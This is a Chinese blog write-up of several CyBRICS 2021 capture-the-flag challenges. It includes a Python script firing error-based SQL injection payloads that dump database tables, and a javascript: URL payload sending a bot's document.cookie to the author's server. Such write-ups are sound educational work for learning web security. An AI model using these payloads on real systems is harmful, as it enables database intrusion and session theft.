<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/author.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/author.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="自己并没有做出来几题，全程被队员们带飞，虽然最后的成绩肯定比不上大佬们的战队，但还是玩的很开心">
<meta property="og:type" content="article">
<meta property="og:title" content="CyBRICS2021">
<meta property="og:url" content="http://example.com/2021/07/26/cyBrics2021/index.html">
<meta property="og:site_name" content="k1te&#39;s blog">
<meta property="og:description" content="自己并没有做出来几题，全程被队员们带飞，虽然最后的成绩肯定比不上大佬们的战队，但还是玩的很开心">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210726111802778.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/r4jxFVxVYuETdLwq.png!thumbnail">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210726120121867.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/X4FDE9YI9mem5dxX.png!thumbnail">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/vid.gif">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/vid.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210726125959718.png">
<meta property="article:published_time" content="2021-07-26T06:42:08.000Z">
<meta property="article:modified_time" content="2021-07-26T05:07:44.793Z">
<meta property="article:author" content="K1te">
<meta property="article:tag" content="wp">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210726111802778.png">

<link rel="canonical" href="http://example.com/2021/07/26/cyBrics2021/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>CyBRICS2021 | k1te's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">k1te's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/07/26/cyBrics2021/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/author.jpg">
      <meta itemprop="name" content="K1te">
      <meta itemprop="description" content="看到我请叫我滚去学web">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="k1te's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CyBRICS2021
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-07-26 14:42:08 / 修改时间：13:07:44" itemprop="dateCreated datePublished" datetime="2021-07-26T14:42:08+08:00">2021-07-26</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%A2%98%E8%A7%A3/" itemprop="url" rel="index"><span itemprop="name">题解</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>自己并没有做出来几题，全程被队员们带飞，虽然最后的成绩肯定比不上大佬们的战队，但还是玩的很开心</p>
<a id="more"></a>

<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="Ad-Network"><a href="#Ad-Network" class="headerlink" title="Ad Network"></a>Ad Network</h2><p>左上角有一张图片，点击之后会不停地重定向，我们只需要修改浏览器的重定向次数，然后让浏览器一直跳就可以了：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210726111802778.png" alt="image-20210726111802778"></p>
<h2 id="Announcement"><a href="#Announcement" class="headerlink" title="Announcement"></a>Announcement</h2><p>注入点在email处，insert注入，左边的digest是email的md5：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/r4jxFVxVYuETdLwq.png!thumbnail" alt="img"></p>
<p>简单的报错注入，因为不想频繁算md5，于是写了个脚本:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">session = requests.Session()</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">genearteMD5</span>(<span class="params"><span class="built_in">str</span></span>):</span></span><br><span class="line">    <span class="comment"># 创建md5对象</span></span><br><span class="line">    hl = hashlib.md5()</span><br><span class="line">    <span class="comment"># Tips</span></span><br><span class="line">    <span class="comment"># 此处必须声明encode</span></span><br><span class="line">    <span class="comment"># 否则报错为：hl.update(str)    Unicode-objects must be encoded before hashing</span></span><br><span class="line">    hl.update(<span class="built_in">str</span>.encode(encoding=<span class="string">&#x27;utf-8&#x27;</span>))</span><br><span class="line">    <span class="keyword">return</span> hl.hexdigest()</span><br><span class="line"></span><br><span class="line"><span class="comment"># 数据库 announcement</span></span><br><span class="line">payload = <span class="string">&quot;1&#x27;or updatexml(1,concat(0x7e,(database()),0x7e),1) or&#x27;&quot;</span></span><br><span class="line"><span class="comment"># 表 emails,logs</span></span><br><span class="line">payload = <span class="string">&quot;&#x27;or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&#x27;announcement&#x27;),0x7e),0) or&#x27;&quot;</span></span><br><span class="line"><span class="comment"># 列 log</span></span><br><span class="line">payload = <span class="string">&quot;&#x27;or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=&#x27;logs&#x27;),0x7e),0) or&#x27;&quot;</span></span><br><span class="line"><span class="comment"># 内容 cybrics&#123;1N53r7_0ld_900d_5ql&#125;</span></span><br><span class="line">payload = <span class="string">&quot;&#x27;or updatexml(1,concat(0x7e,(select group_concat(log) from logs),0x7e),0) or&#x27;&quot;</span></span><br><span class="line"></span><br><span class="line">print(<span class="string">&quot;payload: &quot;</span>+payload)</span><br><span class="line">captcha = genearteMD5(payload)</span><br><span class="line">print(captcha)</span><br><span class="line"></span><br><span class="line">paramsPost = &#123;<span class="string">&quot;digest&quot;</span>:captcha,<span class="string">&quot;email&quot;</span>:payload&#125;</span><br><span class="line">headers = &#123;<span class="string">&quot;Origin&quot;</span>:<span class="string">&quot;http://announcement-cybrics2021.ctf.su&quot;</span>,<span class="string">&quot;Cache-Control&quot;</span>:<span class="string">&quot;max-age=0&quot;</span>,<span class="string">&quot;Accept&quot;</span>:<span class="string">&quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&quot;</span>,<span class="string">&quot;Upgrade-Insecure-Requests&quot;</span>:<span class="string">&quot;1&quot;</span>,<span class="string">&quot;User-Agent&quot;</span>:<span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36&quot;</span>,<span class="string">&quot;Referer&quot;</span>:<span class="string">&quot;http://announcement-cybrics2021.ctf.su/&quot;</span>,<span class="string">&quot;Connection&quot;</span>:<span class="string">&quot;close&quot;</span>,<span class="string">&quot;Accept-Encoding&quot;</span>:<span class="string">&quot;gzip, deflate&quot;</span>,<span class="string">&quot;Accept-Language&quot;</span>:<span class="string">&quot;zh-CN,zh;q=0.9&quot;</span>,<span class="string">&quot;Content-Type&quot;</span>:<span class="string">&quot;application/x-www-form-urlencoded&quot;</span>&#125;</span><br><span class="line">response = session.post(<span class="string">&quot;http://announcement-cybrics2021.ctf.su/&quot;</span>, data=paramsPost, headers=headers)</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    print(re.search(<span class="string">&quot;XPATH syntax error: &#x27;(.*?)&#x27;&quot;</span>,response.text).group())</span><br><span class="line"><span class="keyword">except</span>:</span><br><span class="line">    print(response.text)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h2 id="Multichat"><a href="#Multichat" class="headerlink" title="Multichat"></a>Multichat</h2><p>点开之后一个网络聊天界面，可以加入不同的room，根据题目描述，我们需要找到tech support和admin所在的房间号，然后向admin发送一段文字即可，所以现在的问题就是如何找到这个房间号，房间号的范围特别大，爆破是不可能爆破的了，还有一个技术支持界面跑在5000端口，点击电话图标即可跳转。</p>
<p>说实话不是很懂为什么技术支持要填url，但是题就这么出的，刚开始尝试自己的vps，但是一直没有log，然后又尝试填了xss平台的url，还是不行，最后填了pipedream的才终于可以。然后赛后听队友分享的时候发现大家都有发送成功的回显，而我虽然能收到请求，但是页面直接是502。。。自闭。。。接着也不知道该如何测试，后面问了队友才知道可以使用<code>javascript:</code>，然后就去google了一下，找到了一个有点关联的：<a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/4163879/call-javascript-function-from-url-address-bar">Call Javascript function from URL/address bar - Stack Overflow</a>，还有篇博客：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/suizhikuo/archive/2012/05/03/2481396.html">一个神奇的Javascript运行方式–URL中的JavaScript - 程序员最后都要送外卖 - 博客园 (cnblogs.com)</a>。大概意思就是在浏览器的地址栏中输入形如：<code>javascript:XXX</code>的语句的时候，浏览器会把后面的xxx当作js执行。这种方法只会被浏览器解释，其他的curl之类的好像不行，所以猜测后台有个bot模拟tech support把我们的url贴到浏览器跑？</p>
<p>所以我们可以使用payload：<code>javascript:location.href=&#39;http://vps/?&#39;+document.cookie</code>来把cookie带出来。</p>
<p>然后得到房间号拿flag：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210726120121867.png" alt="image-20210726120121867"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/X4FDE9YI9mem5dxX.png!thumbnail" alt="img"></p>
<h1 id="Cyber-and-rebyC"><a href="#Cyber-and-rebyC" class="headerlink" title="Cyber and rebyC"></a><strong>Cyber</strong> and <strong>rebyC</strong></h1><h2 id="Mic-Check"><a href="#Mic-Check" class="headerlink" title="Mic Check"></a>Mic Check</h2><p>签到其实挺有意思的，对前端不是很熟悉，具体不是很清楚怎么实现的，效果就是这段文字看起来是flag，但是直接复制的话是另一段假的flag，不过赛后没了，不然还能研究研究。</p>
<h2 id="Scanner"><a href="#Scanner" class="headerlink" title="Scanner"></a>Scanner</h2><p>挺好玩的一道题，用一张动图模拟扫描，然后让你认出这是啥，例如这个小房子：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/vid.gif" alt="vid"></p>
<p>思路其实也很简单，只需要把gif一帧一帧拆成png然后再贴起来即可，考虑到，直接贴起来可能会有重复的部分，通过观察大概每隔一张贴起来比较合适，用pillow库写了个脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="comment"># 将gif分解成png</span></span><br><span class="line">    im = Image.<span class="built_in">open</span>(<span class="string">&#x27;vid.gif&#x27;</span>)</span><br><span class="line">    os.mkdir(<span class="string">&#x27;src&#x27;</span>)</span><br><span class="line">    count = <span class="number">0</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">            im.seek(count)</span><br><span class="line">            im.save(<span class="string">&#x27;src/&#x27;</span> + <span class="built_in">str</span>(count) + <span class="string">&#x27;.png&#x27;</span>)</span><br><span class="line">            count = count + <span class="number">1</span></span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line">    print(<span class="string">&#x27;帧数&#x27;</span> + <span class="built_in">str</span>(count))</span><br><span class="line"></span><br><span class="line">	<span class="comment"># 将每张png合起来</span></span><br><span class="line">    target = Image.new(<span class="string">&#x27;RGB&#x27;</span>,(<span class="number">1080</span>,<span class="number">1606</span>))</span><br><span class="line">	<span class="comment"># 每隔一张图片，截取一定的部分，并且拼接起来</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">145</span>,<span class="number">2</span>):</span><br><span class="line">        img = Image.<span class="built_in">open</span>(<span class="string">&#x27;src/&#x27;</span>+ <span class="built_in">str</span>(i) +<span class="string">&#x27;.png&#x27;</span>)</span><br><span class="line">        cropped = img.crop((<span class="number">0</span>,<span class="number">496</span>,<span class="number">1080</span>,<span class="number">517</span>))</span><br><span class="line">        target.paste(cropped,(<span class="number">0</span>,i*<span class="number">11</span>))</span><br><span class="line">    target.save(<span class="string">&quot;vid.png&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>其实前四个是肉眼看出来的，然后第五个看不出来了，写了个脚本才发现是个二维码，最后扫码即可得到flag：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/vid.png" alt="vid"></p>
<h2 id="CAPTCHA-The-Flag"><a href="#CAPTCHA-The-Flag" class="headerlink" title="CAPTCHA The Flag"></a>CAPTCHA The Flag</h2><p>刚开始没仔细看，居然不知道该咋做。。。其实很简单，只需要把图片扒拉下来，然后用StegSolve打开，调到特定的通道即可，类似这样子：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210726125959718.png" alt="image-20210726125959718"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/wp/" rel="tag"># wp</a>
              <a href="/tags/web/" rel="tag"># web</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/05/19/no-column-sql-injection/" rel="prev" title="ctf无列名注入小结">
      <i class="fa fa-chevron-left"></i> ctf无列名注入小结
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/08/03/DasJuly/" rel="next" title="DasJuly X CBCTF 4th 部分wp">
      DasJuly X CBCTF 4th 部分wp <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Web"><span class="nav-number">1.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Ad-Network"><span class="nav-number">1.1.</span> <span class="nav-text">Ad Network</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Announcement"><span class="nav-number">1.2.</span> <span class="nav-text">Announcement</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Multichat"><span class="nav-number">1.3.</span> <span class="nav-text">Multichat</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Cyber-and-rebyC"><span class="nav-number">2.</span> <span class="nav-text">Cyber and rebyC</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Mic-Check"><span class="nav-number">2.1.</span> <span class="nav-text">Mic Check</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Scanner"><span class="nav-number">2.2.</span> <span class="nav-text">Scanner</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CAPTCHA-The-Flag"><span class="nav-number">2.3.</span> <span class="nav-text">CAPTCHA The Flag</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="K1te"
      src="/images/author.jpg">
  <p class="site-author-name" itemprop="name">K1te</p>
  <div class="site-description" itemprop="description">看到我请叫我滚去学web</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://chikorita.fun/" title="https:&#x2F;&#x2F;chikorita.fun&#x2F;" rel="noopener" target="_blank">茗哥</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://oatmeal.vip/" title="https:&#x2F;&#x2F;oatmeal.vip&#x2F;" rel="noopener" target="_blank">Oatmeal</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://examine2.top/" title="https:&#x2F;&#x2F;examine2.top&#x2F;" rel="noopener" target="_blank">examine</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://jan.show/" title="https:&#x2F;&#x2F;jan.show&#x2F;" rel="noopener" target="_blank">Jan</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://eastjun.top/" title="https:&#x2F;&#x2F;eastjun.top&#x2F;" rel="noopener" target="_blank">EastJun</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">K1te</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
